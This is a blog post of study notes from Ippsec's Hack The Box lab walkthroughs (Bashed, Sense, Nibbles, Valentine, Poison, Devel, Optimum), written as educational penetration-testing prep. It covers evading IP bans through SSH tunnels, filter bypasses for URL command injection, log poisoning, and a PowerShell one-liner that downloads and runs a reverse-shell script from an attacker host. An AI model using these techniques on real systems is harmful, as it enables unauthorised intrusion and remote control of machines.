<!DOCTYPE html>
<html lang="en" prefix="og: https://ogp.me/ns#">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible"
      content="IE=edge">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0" />
<meta name="description"
      content="Adventures of Functional Mediocrity" />
<meta name="keywords"
      content="zola, theme, ink, hugo-ink" /> 

<title>John Tuyen | Ippsec Review Notes</title>
<meta
  property="og:title"
  content="John Tuyen | Ippsec Review Notes"
/>
<meta property="og:type" content="website" />
<meta property="og:url" content="https://johntuyen.com/posts/ippsec/" />
<meta property="og:description" content="Adventures of Functional Mediocrity" />
<meta property="og:image" content="" />
<meta property="og:image:url" content="" />
<meta property="og:image:secure_url" content="" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:title" content="Ippsec Review Notes" />
<meta name="twitter:description" content="Adventures of Functional Mediocrity" />
<meta property="twitter:image" content="" />

<link rel="alternate"
          type="application/rss+xml"
          title="John Tuyen"
          href="https://johntuyen.com/atom.xml">
    <link rel="preconnect"
          href="https://fonts.googleapis.com">
    <link rel="preconnect"
          href="https://fonts.gstatic.com"
          crossorigin>
    <!-- <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;700&family=Playfair+Display:wght@700&display=swap" rel="stylesheet">  -->
    <link href="https://fonts.googleapis.com/css2?family=Andada+Pro&display=swap&family=Playfair+Display"
          rel="stylesheet">
    <link rel="stylesheet"
          href="https://johntuyen.com/base.css">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/feather-icons/4.28.0/feather.min.js"
            integrity="sha512-7x3zila4t2qNycrtZ31HO0NnJr8kg2VI67YLoRSyi9hGhRN66FHYWr7Axa9Y1J9tGYHVBPqIjSE1ogHrJTz51g=="
            crossorigin="anonymous"></script>
</head>

<body>
    <header>
        <a class="site-name"
           href="/">
            <h1>John Tuyen</h1>
        </a>
        <div class="site-description">
            <p>Adventures of Functional Mediocrity</p>
        </div>
        <nav>
            <div class="links"> 
            <a 
                href="https://johntuyen.com/ ">About</a> 
            <a 
                href="https://johntuyen.com/posts/ ">Posts</a> 
            <a 
                href="https://johntuyen.com/gallery/ ">Gallery</a> 
            <a 
                href="https://johntuyen.com/tags/ ">Tags</a> 
            <a 
                href="https://johntuyen.com/search/ ">Search</a> 
            </div>
        </nav>
    </header>
    <article>
    

<section class="post">
  <div class="post-header">
    <div class="meta">
      <div class="date">
        <span class="day">24</span>
        <span class="rest">May 19</span>
      </div>
    </div>

    <div class="matter">
      <h1 class="title">Ippsec Review Notes </h1>
    </div>
  </div>
    
  <article><p><img src="https://johntuyen.com/posts/ippsec/oscp-htb-labs.jpeg" alt="OSCP-like HTB Boxes" /></p>
<h3 id="bashed">Bashed</h3>
<ul>
<li>
<p>Web shells aren't persistent. To get a persistent shell, upload or execute a reverse shell script that connects back to an <code>nc</code> session.</p>
</li>
<li>
<p>In the <code>linenum.sh</code> script, this output means that user <code>scriptmanager</code> can run <code>sudo</code> without a password and execute anything as <code>scriptmanager</code>.</p>
</li>
</ul>
<p><img src="https://johntuyen.com/posts/ippsec/ippsec-bashed-sudo.png" alt="ippsec-bashed-sudo" /></p>
<h3 id="sense">Sense</h3>
<ul>
<li>This box is interesting because it's a real world type machine. If you brute force the login page and fail to login for more than 15 times, it will block your IP for 24 hours. Without knowing this, you can assume the box keeps crashing. What this machine teaches you is just because it bans your IP, you should always verify with another machine if it did ban your IP. Also, to bypass the banned IP, you can proxychain your own machine to another host and resume testing again.</li>
</ul>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">ssh -D1080</span><span> 10.10.10.74
</span><span>
</span><span style="color:#bf616a;">vi</span><span> /etc/proxychains
</span><span>
</span><span style="color:#bf616a;">socks5</span><span> 127.0.0.1 1080
</span><span>
</span><span style="color:#bf616a;">proxychains</span><span> curl</span><span style="color:#bf616a;"> -k</span><span> https://10.10.10.1
</span></code></pre>
<ul>
<li>When injecting commands via URL, you sometimes run into issues where certain characters are banned such as dash and slashes. For slashes, you can use the linux environment variable such as HOME because by default it would be empty like this: <code>HOME=/</code>. For dash, you can use <code>printf</code> along with the ascii character that can be found using <code>man ascii</code> page.</li>
</ul>
<p><img src="https://johntuyen.com/posts/ippsec/ippsec-sense-url.png" alt="ippsec-sense-url" /></p>
<p><img src="https://johntuyen.com/posts/ippsec/ippsec-sense-url2.png" alt="ippsec-sense-url2" /></p>
<h3 id="nibbles">Nibbles</h3>
<ul>
<li>Using <code>grep</code> searching for a specific string will lead you with a blob of data with barely readable results.</li>
</ul>
<p><img src="https://johntuyen.com/posts/ippsec/ippsec-nibbles-grep.png" alt="ippsec-nibbles-grep" /></p>
<p>In order to sort this output to a better readable format:</p>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">grep -R</span><span> 4.0.5 . | </span><span style="color:#bf616a;">awk -F</span><span>: &#39;</span><span style="color:#a3be8c;">{print $1}</span><span>&#39; | </span><span style="color:#bf616a;">uniq
</span></code></pre>
<p><img src="https://johntuyen.com/posts/ippsec/ippsec-nibbles-awk.png" alt="ippsec-nibbles-awk" /></p>
<ul>
<li>When viewing URLs that renders a blank page, always try to view source to see if data is readable. There are cases where files are the non-standard web extensions will show up as blank but the file in included in the web server.</li>
</ul>
<p><img src="https://johntuyen.com/posts/ippsec/ippsec-nibbles-bit.png" alt="ippsec-nibbles-bit" /></p>
<ul>
<li>
<p>If you don't want to use exploits using Metasploit modules, you can read the file to see if there is a reference URL that leads to the original post on how to manually execute the exploit. This is a great way to see how the exploit process works rather than a button press get bacon scenario.</p>
</li>
<li>
<p>Instead of always using <code>gobuster</code> or <code>dirbuster</code> to search for possible url links, the other method would be downloading the source code of the software platform and see how the file structure is organized.</p>
</li>
<li>
<p>If you get IP blacklisted due to brute forcing the admin password through the admin control panel, you can use a SSH local port forward feature to bypass this IP restriction. The requirement is having another SSH accessible machine. How SSH local port forward works is:</p>
<ol>
<li>
<p>It will create a localhost port 9000.</p>
</li>
<li>
<p>Any data traffic sent to 9000 will be redirected to the SSH tunnel travelling to the remote machine.</p>
</li>
<li>
<p>The remote machine will then forward the request to the target destination.</p>
</li>
</ol>
</li>
</ul>
<p>Complete command:</p>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">ssh -L9000</span><span>:10.10.10.75:80 10.10.10.73
</span></code></pre>
<p>Breakdown - Creates localhost port 9000:</p>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">ssh -L9000
</span></code></pre>
<p>Breakdown - Forward data using port 80:</p>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">ssh -L9000</span><span>:10.10.10.75:80
</span></code></pre>
<p>Breakdown - Forwarded data is being sent to remote machine 10.10.10.73</p>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">ssh -L9000</span><span>:10.10.10.75:80 10.10.10.73
</span></code></pre>
<p><img src="https://johntuyen.com/posts/ippsec/ippsec-nibbles-sshfwd.png" alt="ippsec-nibbles-sshfwd" /></p>
<ul>
<li>To check for file type:</li>
</ul>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">file</span><span> cmd.php
</span></code></pre>
<p>This is good for bypassing file checking.</p>
<ul>
<li>The <code>-p</code> switch is great for creating a chain of non-existant folder(s)</li>
</ul>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">mkdir -p</span><span> personal/stuff/veryprivate. 
</span></code></pre>
<h3 id="valentine">Valentine</h3>
<ul>
<li>A tool to scan if the https is vulnerable to heartbleed vulnerability.</li>
</ul>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">sslyze</span><span> –heartbleed 10.10.10.79
</span></code></pre>
<p><img src="https://johntuyen.com/posts/ippsec/heartbleed_explanation_2x.png" alt="heartbleed_explanation_2x" /></p>
<ul>
<li>
<p>For a modern exploit like heartbleed, you may think, how do I begin to find this exploit and test it on a system. First, github will be your main source of finding proof of concept code. Second, find forums such as 0x00 and see if there are brief tutorials on how to execute the PoC. Third, if there is no clear tutorials, read the simple explanation concepts and see if you can read the code to dissect how it works. From there, you can tweak the small parts of the code for the desired outcome.</p>
</li>
<li>
<p>An offline way to decode base64 strings:</p>
</li>
</ul>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#96b5b4;">echo </span><span style="color:#bf616a;">-n</span><span> aGVhcnRibGVlZGJlZGJlbGlldmV0aGVoeXBlCg== | </span><span style="color:#bf616a;">base64 -d
</span></code></pre>
<ul>
<li>Something I wasn't aware of is if you have a private .key file, the filename is usually the username.</li>
</ul>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">ssh -i</span><span> hype.key hype@10.10.10.79
</span></code></pre>
<ul>
<li>If <code>linenum.sh</code> script output doesn't show anything obvious, always go back and think about what other simple thing you could do. In this case, you can check out the user home directories for bash history or stored files.</li>
</ul>
<h3 id="poison">Poison</h3>
<ul>
<li>
<p><a href="https://github.com/honze-net/nmap-bootstrap-xsl">Nmap Bootstrap XSL stylesheet</a> - This is pretty cool to visualize nmap logs using a web browser. Great for reports.</p>
</li>
<li>
<p>PHP info File Upload exploit - if phpinfo page shows File Upload is on, you can upload a file and PHP will save the file into a cached directory. PHP server assumes that as long as the file cannot be accessed publicly, there will be no code execution. If you launch an LFI attack, code execution is possible.</p>
</li>
</ul>
<p><img src="https://johntuyen.com/posts/ippsec/ippsec-poison-fileupload.png" alt="ippsec-poison-fileupload" /></p>
<ul>
<li>
<p><a href="https://github.com/swisskyrepo/PayloadsAllTheThings">Payload All The Things</a> - A list of useful payloads and bypasses for Web Application Security</p>
</li>
<li>
<p>There will be times where you download a script and when you try to execute it, errors will occur. Instead of instinctively Googling about the error, pause and think about what the error is about.</p>
<ul>
<li>
<p>Does the script fail before it starts attempting to connect to the target server or does it fail during when it attacks the target server?</p>
</li>
<li>
<p>If it fails during when it attacks the target server, use a middle man tool such as Burpsuite and use the proxy setting to capture what the script is sending.</p>
</li>
<li>
<p>The proxy IP address Burpsuite should use is the target server and port. When you run the script, change the IP address to localhost and target port.</p>
</li>
<li>
<p>If the script is trying to find a specific parameter, why isn't it finding it? Typo? Encoding? Syntax? These are the things you need to pay attention when troubleshooting scripts.</p>
</li>
</ul>
</li>
</ul>
<p>Burpsuite results shows up as <code>&amp;gt</code></p>
<p><img src="https://johntuyen.com/posts/ippsec/ippsec-poison-script2.png" alt="ippsec-poison-script2" /></p>
<p>Script is looking for '&gt;' symbol which resulted a script error.</p>
<p><img src="https://johntuyen.com/posts/ippsec/ippsec-poison-script1.png" alt="ippsec-poison-script1" /></p>
<ul>
<li>
<p><a href="https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences">SANS SSH Konami Code</a> - Useful for running commands on local machine without terminating a running SSH session and other shortcuts.</p>
</li>
<li>
<p>Listen on local ports 6801 and 6901, send any traffic through SSH to 127.0.0.1 5801 and 5901.</p>
</li>
</ul>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">ssh -L6801</span><span>:127.0.0.1:5801 L6901:127.0.0.1:5901 charix@10.10.10.84
</span></code></pre>
<ul>
<li>You can also contaminate the <code>httpd-access.log</code> using Burpsuite through <code>User-Agent</code> tag.</li>
</ul>
<h3 id="devel">Devel</h3>
<ul>
<li>The “ms##” indicates the year of the patch. For example, ms10 would be 2010. If you see a long sequential list of possible exploits, check what the OS version is and check when it was first released. This piece of information will tell you if this machine has been maintained or not.</li>
</ul>
<p><img src="https://johntuyen.com/posts/ippsec/ippsec-devel-mspatches.png" alt="ippsec-devel-mspatches" /></p>
<ul>
<li>In <code>msfconsole</code>, there is a module to suggest an exploit by testing the current open session.</li>
</ul>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">use</span><span> post/multi/recon/local_exploit_suggester
</span></code></pre>
<h3 id="optimum">Optimum</h3>
<ul>
<li>If execution of an exploit doesn't provide feedback results like in Burpsuite, it's a called a blind execution. It's difficult to tell if the exploit worked or not. In these type of scenarios, try simple code execution testing such as pinging back to yourself. To know if the remote server is pinging back, you will need to use tcpdump on the listening interface to see the response back. Once you verify the response is valid, you can proceed with trying to reverse shell the machine.</li>
</ul>
<p>This Burp request won't show results so it's hard to know if remote code execution is successful or not: </p>
<p><img src="https://johntuyen.com/posts/ippsec/ippsec-optimum-ping2.png" alt="ippsec-optimum-ping2" /></p>
<p>But using <code>tcpdump</code> on an interface will monitor the ping response to verify the remote code execution is successful. </p>
<p><img src="https://johntuyen.com/posts/ippsec/ippsec-optimum-ping1.png" alt="ippsec-optimum-ping1" /></p>
<ul>
<li>
<p><a href="https://github.com/samratashok/nishang/tree/master/Shells">https://github.com/samratashok/nishang/tree/master/Shells</a> - Great repo for Powershell reverse shell scripts.</p>
</li>
<li>
<p>Command execution to load Powershell reverse shell:</p>
</li>
</ul>
<pre data-lang="powershell" style="background-color:#2b303b;color:#c0c5ce;" class="language-powershell "><code class="language-powershell" data-lang="powershell"><span>c:\Windows\SysNative\WindowsPowershell\v1.</span><span style="color:#d08770;">0</span><span>\</span><span style="color:#96b5b4;">powershell.exe</span><span> IEX(</span><span style="color:#96b5b4;">New-Object</span><span> Net.WebClient).downloadString(&#39;</span><span style="color:#a3be8c;">http://10.10.10.10:8000/Invoke-PowerShellTcp.ps1</span><span>&#39;)
</span></code></pre>
<p>Encoded in Burpsuite:</p>
<p><img src="https://johntuyen.com/posts/ippsec/ippsec-optimum-powershell.png" alt="ippsec-optimum-powershell" /></p>
<ul>
<li><a href="https://github.com/rasta-mouse/Sherlock">https://github.com/rasta-mouse/Sherlock</a> - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.</li>
</ul>
</article>

  
    
  
  <ul class="tags">
    
      <li><a href='https://johntuyen.com/tags/hackthebox'>hackthebox</a></li>
    
  </ul>
  
  
    
</section>
</article>
    <footer>
        <div class="social">
            <ul> 
                 
                <li>
                    <a href="https://github.com/jtuyen"
                       title="Github" rel="me"><i data-feather="github"></i></a>
                </li>
                 
                 
                <li>
                    <a href="https://twitter.com/jtuyen"
                       title="Twitter"
                       rel="me"><i data-feather="twitter"></i></a>
                </li>
                
                
                
                <li>
                    <a href="https://johntuyen.com/atom.xml"
                       title="John Tuyen"><i data-feather="rss"></i></a>
                </li>
            </ul>
        </div>
        <p> © John Tuyen 2024

        
        <br>Powered by <a target="_blank" href="https://getzola.org/">Zola</a>. Theme: <a target="_blank" href="https://github.com/jimmyff/zola-inky">Inky</a>.
        </p>
    </footer>
    <script>
        feather.replace();
    </script> 
    </body>
</html>